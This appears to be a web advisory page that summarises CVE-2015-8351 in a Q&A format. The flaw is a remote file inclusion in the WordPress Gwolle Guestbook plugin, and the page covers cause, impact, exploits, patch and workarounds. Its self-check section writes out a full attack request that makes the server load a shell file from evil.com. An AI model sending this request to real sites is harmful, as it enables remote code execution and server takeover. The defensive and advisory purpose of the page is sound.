Goal Reached Thanks to every supporter β€” we hit 100%!

Goal: 1000 CNY Β· Raised: 1000 CNY

100.0%

CVE-2015-8351 β€” AI Deep Analysis Summary

Q1What is this vulnerability? (Essence + Consequences)

🚨 **Essence**: Remote File Inclusion (RFI) in Gwolle Guestbook plugin.…

Q2Root Cause? (CWE/Flaw)

πŸ›‘οΈ **Root Cause**: Lack of input validation/sanitization. πŸ” **Flaw**: The `abspath` GET parameter is passed directly to PHP's `require()` function without checking if it is a local file or a remote URL.

Q3Who is affected? (Versions/Components)

πŸ“¦ **Affected**: WordPress Gwolle Guestbook Plugin. πŸ“… **Versions**: **1.5.3 and earlier**. πŸ–₯️ **Platform**: PHP/MySQL WordPress sites.

Q4What can hackers do? (Privileges/Data)

πŸ’€ **Hackers Can**: Execute arbitrary PHP code. πŸ“‚ **Impact**: Full server compromise, data theft, backdoor installation. πŸš€ **Privileges**: Equivalent to the web server user (often root/admin access via RCE).

Q5Is exploitation threshold high? (Auth/Config)

πŸ”“ **Threshold**: **LOW**. 🚫 **Auth**: No authentication required. 🌐 **Access**: Publicly accessible endpoint (`ajaxresponse.php`). Any visitor can trigger the exploit.

Q6Is there a public Exp? (PoC/Wild Exploitation)

πŸ”₯ **Public Exp?**: **YES**. Multiple Python scripts available on GitHub (e.g., `gwolle_buster.py`) and Exploit-DB (ID: 38861). πŸ› οΈ **Automation**: Scripts auto-generate reverse shells and handle netcat listeners.

Q7How to self-check? (Features/Scanning)

πŸ” **Self-Check**: Scan for `Gwolle Guestbook` plugin. πŸ§ͺ **Test**: Send HTTP GET request to `/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://evil.com/shell.txt`.…

Q8Is it fixed officially? (Patch/Mitigation)

🩹 **Fixed?**: **YES**. The WordPress plugin changelog confirms fixes. πŸ“‰ **Action**: Update Gwolle Guestbook to the latest version immediately. 🚫 **Old Versions**: 1.5.3 and below are unsafe.

Q9What if no patch? (Workaround)

🚧 **No Patch?**: 1. Disable the plugin immediately. πŸ›‘ 2. Block access to `frontend/captcha/ajaxresponse.php` via WAF or `.htaccess`. 🧹 3. Remove the plugin directory if not needed.

Q10Is it urgent? (Priority Suggestion)

⚠️ **Urgency**: **CRITICAL**. πŸ”΄ **Priority**: **P0**. Since it requires no auth and allows RCE, automated bots are likely scanning for this. Patch **NOW** to prevent immediate compromise.